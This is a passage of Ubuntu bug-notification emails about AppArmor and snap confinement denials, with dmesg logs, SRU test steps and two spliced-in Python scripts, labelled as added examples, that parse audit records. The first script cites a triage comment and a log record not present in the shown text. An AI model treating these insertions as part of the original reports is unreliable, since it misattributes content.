  [13682.453430] audit: type=1400 audit(1571920851.001:3673): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/usr/share/drirc.d/00-mesa-defaults.conf" pid=17792 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0
  [13682.453933] audit: type=1400 audit(1571920851.001:3674): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/usr/share/libdrm/amdgpu.ids" pid=17792 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0
  [13682.455491] audit: type=1400 audit(1571920851.005:3675): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/home/chris/.cache/mesa_shader_cache/index" pid=17792 comm="soffice.bin" requested_mask="wrc" denied_mask="wrc" fsuid=1000 ouid=1000
  [13682.604100] audit: type=1400 audit(1571920851.153:3676): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/home/chris/.local/share/gvfs-metadata/smb-share:server=buddha,share=chris" pid=17791 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=1000
  [13682.604138] audit: type=1400 audit(1571920851.153:3677): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/home/chris/.local/share/gvfs-metadata/smb-share:server=buddha,share=chris-22028640.log" pid=17791 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=1000
  [13683.097648] audit: type=1400 audit(1571920851.645:3678): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/home/chris/.mozilla/firefox/vq2zzheq.chris-2019-09/cert8.db" pid=17791 comm="soffice.bin" requested_mask="w" denied_mask="w" fsuid=1000 ouid=1000
  [16676.510664] kauditd_printk_skb: 1210 callbacks suppressed
  [16676.510665] audit: type=1400 audit(1571923845.047:4889): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/usr/share/drirc.d/00-mesa-defaults.conf" pid=18543 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0
  [16676.511473] audit: type=1400 audit(1571923845.047:4890): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/usr/share/drirc.d/00-mesa-defaults.conf" pid=18543 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0
  [16676.550636] audit: type=1400 audit(1571923845.087:4891): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/usr/share/drirc.d/00-mesa-defaults.conf" pid=18543 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0
  [16676.551394] audit: type=1400 audit(1571923845.087:4892): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/usr/share/drirc.d/00-mesa-defaults.conf" pid=18543 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0
  [16676.552145] audit: type=1400 audit(1571923845.087:4893): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/usr/share/drirc.d/00-mesa-defaults.conf" pid=18543 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0
  [16676.552568] audit: type=1400 audit(1571923845.087:4894): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/usr/share/libdrm/amdgpu.ids" pid=18543 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0
  [16676.553912] audit: type=1400 audit(1571923845.091:4895): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/home/chris/.cache/mesa_shader_cache/index" pid=18543 comm="soffice.bin" requested_mask="wrc" denied_mask="wrc" fsuid=1000 ouid=1000
  [16694.388901] audit: type=1400 audit(1571923862.923:4896): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/proc/18541/mountinfo" pid=18541 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=1000
  [16694.388972] audit: type=1400 audit(1571923862.923:4897): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/proc/18541/cgroup" pid=18541 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=1000
  [16694.388992] audit: type=1400 audit(1571923862.923:4898): apparmor="ALLOWED" operation="open"
[Desktop-packages] [Bug 1849680] Re: audit spam in dmesg (libreoffice)
libreoffice ships this profile, so the bug should be tracked there.

** Package changed: apparmor (Ubuntu) => libreoffice (Ubuntu)

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to libreoffice in Ubuntu.
https://bugs.launchpad.net/bugs/1849680

Title: audit spam in dmesg (libreoffice)
Status in libreoffice package in Ubuntu: New
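The triage rule from the comment on this bug (non-/home, read-only accesses are fine to add to the profile), applied to the dmesg records quoted in the report. This is an added example, not part of the bug report or of the libreoffice packaging; the function names, the choice to collapse /proc/<pid>/ into AppArmor's @{pid} variable, and the emitted rule lines are assumptions of the example.

```python
import re
from collections import Counter

# Subset of the dmesg lines quoted in the bug report, copied verbatim, including
# the kauditd rate-limit notice and the final record that is cut off mid-line.
SAMPLE = r'''
[13682.452555] audit: type=1400 audit(1571920851.001:3672): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/usr/share/drirc.d/00-mesa-defaults.conf" pid=17792 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0
[13682.453933] audit: type=1400 audit(1571920851.001:3674): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/usr/share/libdrm/amdgpu.ids" pid=17792 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0
[13682.455491] audit: type=1400 audit(1571920851.005:3675): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/home/chris/.cache/mesa_shader_cache/index" pid=17792 comm="soffice.bin" requested_mask="wrc" denied_mask="wrc" fsuid=1000 ouid=1000
[13682.604100] audit: type=1400 audit(1571920851.153:3676): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/home/chris/.local/share/gvfs-metadata/smb-share:server=buddha,share=chris" pid=17791 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=1000
[13683.097648] audit: type=1400 audit(1571920851.645:3678): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/home/chris/.mozilla/firefox/vq2zzheq.chris-2019-09/cert8.db" pid=17791 comm="soffice.bin" requested_mask="w" denied_mask="w" fsuid=1000 ouid=1000
[16676.510664] kauditd_printk_skb: 1210 callbacks suppressed
[16676.510665] audit: type=1400 audit(1571923845.047:4889): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/usr/share/drirc.d/00-mesa-defaults.conf" pid=18543 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0
[16694.388901] audit: type=1400 audit(1571923862.923:4896): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/proc/18541/mountinfo" pid=18541 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=1000
[16694.388992] audit: type=1400 audit(1571923862.923:4898): apparmor="ALLOWED" operation="open"
'''

# key=value pairs; a quoted value may itself contain '=' and ',' (see the gvfs path).
FIELD = re.compile(r'(\w+)=("([^"]*)"|\S+)')
PROC_PID = re.compile(r'^/proc/\d+/')
REQUIRED = ('profile', 'name', 'requested_mask')


def parse_record(line):
    """Return the fields of one AppArmor audit record, or None for other lines."""
    if 'apparmor=' not in line:
        return None  # e.g. the kauditd "callbacks suppressed" notice
    fields = {}
    for m in FIELD.finditer(line):
        raw = m.group(2)
        fields[m.group(1)] = m.group(3) if raw.startswith('"') else raw
    return fields


def triage(text):
    """Split unique accesses into profile candidates and ones needing review."""
    candidates, review, malformed = Counter(), Counter(), 0
    for line in text.splitlines():
        rec = parse_record(line)
        if rec is None:
            continue
        if not all(k in rec for k in REQUIRED):
            malformed += 1  # truncated record: never guess the missing path
            continue
        # Assumption of this example: per-process /proc paths are generalised.
        path = PROC_PID.sub('/proc/@{pid}/', rec['name'])
        key = (rec['profile'], path, rec['requested_mask'])
        read_only = rec['requested_mask'] == 'r'
        if read_only and not path.startswith('/home/'):
            candidates[key] += 1
        else:
            review[key] += 1  # anything under /home, or any write/create
    return {'candidates': candidates, 'review': review, 'malformed': malformed}


def draft_rules(candidates):
    """Render candidate accesses as AppArmor file rules, one per unique path."""
    paths = sorted({path for (_profile, path, _mask) in candidates})
    return [f'  {path} r,' for path in paths]


if __name__ == '__main__':
    result = triage(SAMPLE)
    print('candidate rules:')
    print('\n'.join(draft_rules(result['candidates'])))
    print('needs review:')
    for (profile, path, mask), n in sorted(result['review'].items()):
        print(f'  {profile}: {path} ({mask}) x{n}')
    print('malformed records skipped:', result['malformed'])
```

The write to another application's cert8.db and the accesses under /home land in the review set rather than in the drafted rules, which is the split the triage comment asks for.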
[Desktop-packages] [Bug 1848919] Re: [snap] Permission denied on Private encrypted folder
** Changed in: apparmor
   Status: Triaged => In Progress

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to chromium-browser in Ubuntu.
https://bugs.launchpad.net/bugs/1848919

Title: [snap] Permission denied on Private encrypted folder
Status in AppArmor: In Progress
Status in snapd: In Progress
Status in chromium-browser package in Ubuntu: Invalid
Status in snapd package in Ubuntu: Triaged

Bug description:
  When accessing the Private (/home/username/Private, Encrypted Directory) folder (e.g. via "Link save as...") it shows "Could not read contents of Private, Error opening directory ...: Permission denied"

  Package: chromium-browser
  Version: 77.0.3865.120-0ubuntu1~snap1

To manage notifications about this bug go to: https://bugs.launchpad.net/apparmor/+bug/1848919/+subscriptions
[Desktop-packages] [Bug 1482852] Re: apparmor profile usr.bin.firefox missing abstractions/ubuntu-helpers
** Package changed: apparmor (Ubuntu) => firefox (Ubuntu)

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to firefox in Ubuntu.
https://bugs.launchpad.net/bugs/1482852

Title: apparmor profile usr.bin.firefox missing abstractions/ubuntu-helpers
Status in firefox package in Ubuntu: New

Bug description:
  When trying to open link to a torrent apparmor denies my bittorrent client. The log message I got is:

  audit: type=1400 audit(1439028251.208:1075): apparmor="DENIED" operation="exec" info="profile not found" error=-13 profile="/usr/lib/firefox/firefox{,*[^s][^h]}" name="/usr/bin/transmission-gtk" pid=32092 comm="firefox" requested_mask="x" denied_mask="x" fsuid=1000 ouid=0

  Although ubuntu-helpers is included in abstractions/ubuntu-bittorrent-clients to allow x access to transmission, firefox profile also needs to include abstractions/ubuntu-helpers.

  It is also strange that when I add definition of ubuntu-helpers to usr.bin.firefox aa-enforce fails during bootup with message

  Multiple definitions for hat sanitized_helper in profile (null) exist,bailing out.

  but when I restart it it seems to set profiles OK with no error.

To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/firefox/+bug/1482852/+subscriptions
[Desktop-packages] [Bug 1580463] Re: Snap blocks access to system input methods (ibus, fcitx, ...)
@Gunnar - I am preparing the focal upload now, though there is a parser bug (bug 1856738) which means I cannot use @{HOME} in the rule and instead hardcode /home/*/. This will cover all typical situations (ie, not the atypical /root/.cache/ibus...) except when the user updates /etc/apparmor.d/tunables/home.d/ to add a different directory for home. With snaps (this bug) we don't support alternate locations for /home just yet, so this is not a regression. We plan to fix that parser bug for 20.04. You may want to hold off on a 1.5.22 upload (or revert the XDG patch) until this is updated to avoid regression non-snap, ibus abstraction apparmor users with non-default home.

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to ibus in Ubuntu.
https://bugs.launchpad.net/bugs/1580463

Title: Snap blocks access to system input methods (ibus, fcitx, ...)
Status in ibus: Fix Released
Status in apparmor package in Ubuntu: Fix Released
Status in ibus package in Ubuntu: In Progress
Status in im-config package in Ubuntu: Fix Released
Status in snapd package in Ubuntu: Fix Released
Status in apparmor source package in Xenial: Fix Released
Status in im-config source package in Xenial: Fix Released
Status in snapd source package in Xenial: Fix Released
Status in apparmor source package in Yakkety: Fix Released
Status in im-config source package in Yakkety: Fix Released
Status in snapd source package in Yakkety: Fix Released

Bug description:
  = SRU im-config =

  [Impact]
  ibus-daemon by default uses a unix socket name of /tmp/dbus-... that is indistinguishable from dbus-daemon abstract sockets. While dbus-daemon has AppArmor mediation, ibus-daemon does not so it is important that its abstract socket not be confused with dbus-daemon's. By modifying ibus-daemon's start arguments to use "--address 'unix:tmpdir=/tmp/ibus'" AppArmor can continue mediating DBus abstract sockets like normal and also mediate access to the ibus-daemon-specific abstract socket via unix rules. This also tidies up the abstract socket paths so that it is clear which are for ibus-daemon, which for dbus-daemon, etc.

  The upload simply adjusts 21_ibus.rc to start ibus-daemon with "--address 'unix:tmpdir=/tmp/ibus'" and adds a comment. No compiled code changes are required.

  [Test Case]
  1. start a unity session before updating to the package in -proposed
  2. $ grep IBUS_ADDRESS ~/.config/ibus/bus/*-unix-0
     IBUS_ADDRESS=unix:abstract=/tmp/dbus-Vyx8fGFA,guid=28e8e7e89f902c8d4e9d77c5557add76
  3. $ lsof -p $(pidof ibus-daemon) | grep '/dbus'
     ibus-daem 2973 jamie 8u unix 0x 0t0 29606 @/tmp/dbus-oxKYpN30 type=STREAM
  4. update the package in -proposed and perform '2' and '3'. The IBUS_ADDRESSES should be the same as before
  5. logout of unity, then log back in
  6. $ grep IBUS_ADDRESS ~/.config/ibus/bus/*-unix-0
     IBUS_ADDRESS=unix:abstract=/tmp/ibus/dbus-SpxOl8Fc,guid=06d4bbeb07614c6dffbf221c57473f4e
     (notice '/tmp/ibus/' in the path)
  7. $ lsof -p $(pidof ibus-daemon) | grep '/dbus'
     ibus-daem 3471 jamie 8u unix 0x 0t0 26107 @/tmp/ibus/dbus-SpxOl8Fc type=STREAM
     ...
     (notice '@/tmp/ibus/' in the path)

  In addition to the above, you can test for regressions by opening 'System Settings' under the 'gear' icon in the panel and selecting 'Text Entry'. From there, add an input source on the right, make sure 'Show current input source in the menu bar' is checked, then use the input source panel indicator to change input sources.

  Extended test case to verify input support still works in unconfined and confined applications:
  1. Systems Settings Language Support, if prompted install the complete language support
  2. Install Chinese (simple and traditional)
  3. sudo apt-get install ibus-pinyin ibus-sunpinyin
  4. logout / login
  5. System Settings / Text Entry - add Chinese (Pinyin) (IBus)
  6. select pinyin from the indicator
  7. sudo lsof | grep ibus | grep @ # will use @/tmp/dbus-...
  8. open gnome-calculator and try to type something in (should get a pop-up)
  9. open evince and try to search a pdf (should get a pop up)
  10. upgrade apparmor and im-config from xenial-proposed
  11. logout and back in
  12. sudo lsof | grep ibus | grep @ # will use @/tmp/ibus/...
  13. open gnome-calculator and try to type something in (should get a pop-up)
  14. open evince and try to search a pdf (should get a pop up)
  15. verify no new apparmor denials

  [Regression Potential]
  The regression potential is considered low because there are no compiled code changes and because the changes only occur after ibus-daemon is restarted, which is upon session start, not package upgrade. When it is restarted, the files in ~/.config/ibus/bus/*-unix-0 are updated accordingly for other applications to pick up.

  This change intentionally requires a
[Desktop-packages] [Bug 1781428] Re: please enable snap mediation support
Note, there is a spread test in snapd that checks for if the mediation patches are dropped (or added). While it is fine for https://launchpad.net/bugs/1856054 to be fast tracked, this pulseaudio bug should not be marked as Fix Released before the end of year break unless you coordinate with the snapd team first so as to avoid the spread test failing when no one is around to fix it. Specifically, snapd needs:

https://github.com/snapcore/snapd/pull/7885
https://github.com/snapcore/snapd/pull/7886

To be clear, the snapd deb doesn't need to be involved in any of this; it is just coordinating with upstream so the upstream CI doesn't break over the holidays.

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to pulseaudio in Ubuntu.
https://bugs.launchpad.net/bugs/1781428

Title: please enable snap mediation support
Status in pulseaudio package in Ubuntu: Fix Released
Status in pulseaudio source package in Xenial: Fix Committed
Status in pulseaudio source package in Bionic: Fix Committed

Bug description:
  [Impact]
  Ubuntu 16.10 added rudimentary snap support to disable audio recording if the connecting process was a snap. By Ubuntu 18.04, something changed in the build resulting in 'Enable Snappy support: no' with audio recording no longer being mediated by pulseaudio (access to the pulseaudio socket continued to be mediated by snapd's apparmor policy). This resulted in any application with the pulseaudio interface connected to be able to also record. Ubuntu 16.04 never had mediation patches and always allowed recording when the pulseaudio interface was connected.

  To correct this situation but not regress existing behavior, Ubuntu 19.04's pulseaudio was updated patch to allow playback to all connected clients (snaps or not), record by classic snaps (see bug 1787324) and record by strict mode snaps if either the pulseaudio or new-in-snapd-2.41 audio-record interfaces were connected. With this change, snapd is in a position to migrate snaps to the new audio-playback and audio-record interfaces and properly mediate audio recording (see https://forum.snapcraft.io/t/upcoming-pulseaudio-interface-deprecation/13418).

  The patch to pulseaudio consists of adding a module, enabling it in default.pa and then when it is enabled, pulseaudio when faced with a record operation will, when the connecting process is a snap (ie, its security label (ie, apparmor label) starts with 'snap.'), query snapd via its control socket to ask if the snap is classic and if not, whether the pulseaudio or audio-record interfaces are connected.

  Adjusting pulseaudio in the manner does not require coordination with any release of snapd. It does need a newer version of snapd-glib, which was recently updated to 1.49 in the last SRU.

  [Test Case]
  IMPORTANT: if updating pulseaudio while the session is running, either need to reboot for the test or kill pulseaudio so it can restart with the new snap policy

  For unconfined applications:
  $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes"
  yes
  $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording
  ^Cyes
  $ paplay /tmp/out.wav && echo "yes"
  yes

  For confined, non-snap applications:
  $ sudo apt-get install evince
  $ aa-exec -p /usr/bin/evince -- paplay /usr/share/sounds/alsa/Noise.wav && echo yes
  $ rm -f /tmp/out.wav ; aa-exec -p /usr/bin/evince -- parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording
  ^Cyes
  $ aa-exec -p /usr/bin/evince -- paplay /tmp/out.wav && echo "yes"
  yes

  For classic snaps:
  $ sudo snap install test-snapd-classic-confinement --classic
  $ snap run --shell test-snapd-classic-confinement
  $ cat /proc/self/attr/current # verify we are classic confined
  snap.test-snapd-classic-confinement.test-snapd-classic-confinement (complain)
  $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes"
  yes
  $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording
  ^Cyes
  $ paplay /tmp/out.wav && echo "yes"
  yes
  $ exit # out of snap run --shell

  For strict snaps with pulseaudio:
  $ sudo snap install test-snapd-pulseaudio --edge
  $ snap connections test-snapd-pulseaudio
  Interface Plug Slot Notes
  pulseaudio test-snapd-pulseaudio:pulseaudio :pulseaudio -
  $ test-snapd-pulseaudio.play --help # ensure SNAP dirs are created
  ...
  $ sudo cp /usr/share/sounds/alsa/Noise.wav /var/snap/test-snapd-pulseaudio/common/
  $ test-snapd-pulseaudio.play /var/snap/test-snapd-pulseaudio/common/Noise.wav && echo yes
  xcb_connection_has_error() returned true
  yes
  (note, the xcb_connection_has_error() message is due to the x11 interface not being connected which is unrelated to mediation. x11 is left out to ensure that just audio-playback/audio-record are tested)
  $ test-snapd-pulseaudio.record
[Desktop-packages] [Bug 1851211] Re: [snap] SoloKeys not supported by u2f-devices interface
** Changed in: snapd
   Status: In Progress => Fix Released

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to chromium-browser in Ubuntu.
https://bugs.launchpad.net/bugs/1851211

Title:
  [snap] SoloKeys not supported by u2f-devices interface

Status in snapd:
  Fix Released
Status in chromium-browser package in Ubuntu:
  Confirmed
Status in snapd package in Ubuntu:
  Triaged

Bug description:
  This affects the current build of the snap version of Chromium. Although it was marked as fixed in the ticket here: https://bugs.launchpad.net/ubuntu/+source/chromium-browser/+bug/1738164 it is still open.

  No chance to use such a key in the browser.
  dmesg output is:

  My dmesg output shows a lot of DENIED:
  audit: type=1107 audit(1572541712.846:243): pid=954 uid=106 auid=4294967295 ses=4294967295 msg='apparmor="DENIED" operation="dbus_method_call" bus="system" path="/" interface="org.freedesktop.DBus.ObjectManager" member="GetManagedObjects" mask="send" name="org.bluez" pid=20568 label="snap.chromium.chromium" peer_pid=946 peer_label="unconfined" exe="/usr/bin/dbus-daemon" sauid=106 hostname=? addr=? terminal=?'
  [ 7036.430639] audit: type=1400 audit(1572541713.042:244): apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name="/var/lib/snapd/desktop/icons/" pid=20568 comm="chrome" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0
  [ 7036.430641] audit: type=1400 audit(1572541713.042:245): apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name="/var/lib/snapd/desktop/icons/" pid=20568 comm="chrome" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0
  [ 7049.256201] audit: type=1400 audit(1572541725.870:246): apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name="/sys/devices/pci:00/:00:15.1/i2c_designware.1/i2c-2/i2c-ELAN1200:00/0018:04F3:3022.0001/report_descriptor" pid=20568 comm="ThreadPoolForeg" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0

  Suggested solutions in the other tickets do not work

  System is Ubuntu 19.10 on an Asus UX330
  ---
  ProblemType: Bug
  ApportVersion: 2.20.11-0ubuntu8.2
  Architecture: amd64
  CurrentDesktop: ubuntu:GNOME
  DRM.card0-HDMI-A-1:
   enabled: enabled
   dpms: On
   status: connected
   modes: 1920x1080 1920x1080 1920x1080 1920x1080 1920x1080i 1920x1080i 1920x1080i 1920x1080 1920x1080i 1680x1050 1280x1024 1280x960 1280x720 1280x720 1280x720 1280x720 1024x768 800x600 720x576 720x480 720x480 720x480 720x480 640x480 640x480 640x480
  DRM.card0-eDP-1:
   enabled: disabled
   dpms: Off
   status: connected
   modes: 1920x1080
  DiskUsage:
   Filesystem  Type   Size  Used  Avail  Use%  Mounted on
   /dev/sda6   ext4   184G  35G   140G   20%   /home
   tmpfs       tmpfs  7,8G  152M  7,7G   2%    /dev/shm
   /dev/sda6   ext4   184G  35G   140G   20%   /home
  DistroRelease: Ubuntu 19.10
  InstallationDate: Installed on 2017-09-30 (766 days ago)
  InstallationMedia: Ubuntu 17.04 "Zesty Zapus" - Release amd64 (20170412)
  Lsusb:
   Bus 002 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub
   Bus 001 Device 004: ID 8087:0a2b Intel Corp.
   Bus 001 Device 003: ID 0bda:58d1 Realtek Semiconductor Corp. USB2.0 HD UVC WebCam
   Bus 001 Device 002: ID 046d:c52b Logitech, Inc. Unifying Receiver
   Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
  MachineType: ASUSTeK COMPUTER INC. UX330UAK
  Package: chromium-browser 77.0.3865.120-0ubuntu1.19.10.1
  PackageArchitecture: amd64
  ProcEnviron:
   TERM=xterm-256color
   PATH=(custom, no user)
   XDG_RUNTIME_DIR=
   LANG=de_DE.UTF-8
   SHELL=/bin/bash
  ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-5.3.0-19-generic root=UUID=33f0c319-6f77-49d2-85ed-236d397fc004 ro quiet splash vt.handoff=7
  ProcVersionSignature: Ubuntu 5.3.0-19.20-generic 5.3.1
  Snap.ChromeDriverVersion: ChromeDriver 78.0.3904.70 (edb9c9f3de0247fd912a77b7f6cae7447f6d3ad5-refs/branch-heads/3904@{#800})
  Snap.ChromiumVersion: Chromium 78.0.3904.70 snap
  Tags: eoan snap
  Uname: Linux 5.3.0-19-generic x86_64
  UpgradeStatus: Upgraded to eoan on 2019-10-23 (14 days ago)
  UserGroups: adm cdrom daemon dialout dip docker kvm lpadmin plugdev sambashare sudo www-data
  _MarkForUpload: True
  dmi.bios.date: 04/19/2019
  dmi.bios.vendor: American Megatrends Inc.
  dmi.bios.version: UX330UAK.315
  dmi.board.asset.tag:
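A triage helper for the kind of dmesg output quoted in this report, added here as an example (it is not part of the bug report or of snapd). It reads both record shapes that appear above, the kernel type=1400 lines and the type=1107 D-Bus line whose AppArmor fields sit inside msg='...', and counts denials per snap, operation and resource; the function names are this example's own.

```python
import re
from collections import Counter

# Records 1-4 are copied from the dmesg output in the report above; the last
# line is constructed here to show that unrelated kernel messages are skipped.
SAMPLE = r'''
audit: type=1107 audit(1572541712.846:243): pid=954 uid=106 auid=4294967295 ses=4294967295 msg='apparmor="DENIED" operation="dbus_method_call" bus="system" path="/" interface="org.freedesktop.DBus.ObjectManager" member="GetManagedObjects" mask="send" name="org.bluez" pid=20568 label="snap.chromium.chromium" peer_pid=946 peer_label="unconfined" exe="/usr/bin/dbus-daemon" sauid=106 hostname=? addr=? terminal=?'
[ 7036.430639] audit: type=1400 audit(1572541713.042:244): apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name="/var/lib/snapd/desktop/icons/" pid=20568 comm="chrome" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0
[ 7036.430641] audit: type=1400 audit(1572541713.042:245): apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name="/var/lib/snapd/desktop/icons/" pid=20568 comm="chrome" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0
[ 7049.256201] audit: type=1400 audit(1572541725.870:246): apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name="/sys/devices/pci:00/:00:15.1/i2c_designware.1/i2c-2/i2c-ELAN1200:00/0018:04F3:3022.0001/report_descriptor" pid=20568 comm="ThreadPoolForeg" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0
[ 7050.000000] usb 1-2: new full-speed USB device number 5 using xhci_hcd
'''

# key="quoted value" or key=bare_value
PAIR = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')
# type=1107 records carry the AppArmor fields inside msg='...'
USERSPACE_MSG = re.compile(r"msg='(.*)'")


def snap_name(subject):
    """Both snap.<snap>.<app> and snap-update-ns.<snap> labels name a snap."""
    parts = subject.split(".")
    if parts[0] == "snap" and len(parts) >= 3:
        return parts[1]
    if parts[0] == "snap-update-ns" and len(parts) >= 2:
        return parts[1]
    return None


def parse_denial(line):
    """Return the fields of one AppArmor DENIED record, or None for other lines."""
    if 'apparmor="DENIED"' not in line:
        return None
    # In a msg='...' record the pid outside the wrapper belongs to dbus-daemon;
    # the pid inside it is the denied client, so only the inner part is parsed.
    wrapped = USERSPACE_MSG.search(line)
    body = wrapped.group(1) if wrapped else line
    fields = {key: (quoted or bare) for key, quoted, bare in PAIR.findall(body)}

    subject = fields.get("profile") or fields.get("label", "?")
    operation = fields.get("operation", "?")
    if operation.startswith("dbus_"):
        resource = "dbus:{} {} {}.{}".format(
            fields.get("bus", "?"), fields.get("name", "?"),
            fields.get("interface", "?"), fields.get("member", "?"))
    elif operation == "capable":
        resource = "capability:" + fields.get("capname", "?")
    else:
        resource = fields.get("name", "?")
    pid = fields.get("pid", "")
    return {
        "subject": subject,
        "snap": snap_name(subject),
        "operation": operation,
        "resource": resource,
        "mask": fields.get("denied_mask") or fields.get("mask", ""),
        "pid": int(pid) if pid.isdigit() else None,
    }


def summarise(text):
    """Count denials per (snap, operation, resource, mask) over a log excerpt."""
    counts = Counter()
    for line in text.splitlines():
        denial = parse_denial(line)
        if denial:
            counts[(denial["snap"], denial["operation"],
                    denial["resource"], denial["mask"])] += 1
    return counts


if __name__ == "__main__":
    for key, count in summarise(SAMPLE).most_common():
        print(count, *key)
```

Grouping the records this way separates the repeated icon-directory reads from the single D-Bus and sysfs denials, which makes it easier to see which interface a given denial would fall under.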
[Desktop-packages] [Bug 1855477] Re: gnome-control-center will not let me paste in a password from my password manger
Thank you for using Ubuntu and reporting a bug. Are you using wayland or Xorg for your desktop session? What password manager are you using?

** Information type changed from Private Security to Public Security

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to gnome-control-center in Ubuntu.
https://bugs.launchpad.net/bugs/1855477

Title:
  gnome-control-center will not let me paste in a password from my password manger

Status in gnome-control-center package in Ubuntu:
  New

Bug description:
  Gnome-control-center online-accounts will not let me paste my google password in. Since I use long secure complex passwords, typing in passwords is not a viable option. Please fix this bug.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/gnome-control-center/+bug/1855477/+subscriptions
[Desktop-packages] [Bug 1739468] Re: Repeated [AppIndicatorSupport-WARN] Item :1.51/org/ayatana/NotificationItem/multiload is already registered
Why is this low importance when anyone who has this issue should be quitting the application rendering it useless, seems pretty high to me. What else could possibly trump this?

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to gnome-shell-extension-appindicator in Ubuntu.
https://bugs.launchpad.net/bugs/1739468

Title:
  Repeated [AppIndicatorSupport-WARN] Item :1.51/org/ayatana/NotificationItem/multiload is already registered

Status in gnome-shell-extension-appindicator package in Ubuntu:
  Confirmed
Status in indicator-multiload package in Ubuntu:
  Confirmed

Bug description:
  The following message is continuously logged to /var/log/syslog (every few seconds):

  Dec 20 10:29:26 lxjima gnome-shell[13730]: [AppIndicatorSupport-WARN] Attempting to re-register :1.51/org/ayatana/NotificationItem/multiload; resetting instead
  Dec 20 10:29:26 lxjima gnome-shell[13730]: [AppIndicatorSupport-WARN] Item :1.51/org/ayatana/NotificationItem/multiload is already registered

  It's hard to find anything in syslog because thousands of these messages intermingle with everything else

  ProblemType: Bug
  DistroRelease: Ubuntu 17.10
  Package: gnome-shell 3.26.2-0ubuntu0.1
  ProcVersionSignature: Ubuntu 4.13.0-19.22-generic 4.13.13
  Uname: Linux 4.13.0-19-generic x86_64
  ApportVersion: 2.20.7-0ubuntu3.6
  Architecture: amd64
  CurrentDesktop: ubuntu:GNOME
  Date: Wed Dec 20 10:28:49 2017
  DisplayManager: gdm3
  InstallationDate: Installed on 2017-12-13 (7 days ago)
  InstallationMedia: Ubuntu 17.10 "Artful Aardvark" - Release amd64 (20171018)
  SourcePackage: gnome-shell
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/gnome-shell-extension-appindicator/+bug/1739468/+subscriptions
[Desktop-packages] [Bug 1848919] Re: [snap] Permission denied on Private encrypted folder
https://github.com/snapcore/snapd/pull/7779

** Also affects: snapd
   Importance: Undecided
   Status: New

** Changed in: snapd (Ubuntu)
   Assignee: Jamie Strandboge (jdstrand) => (unassigned)

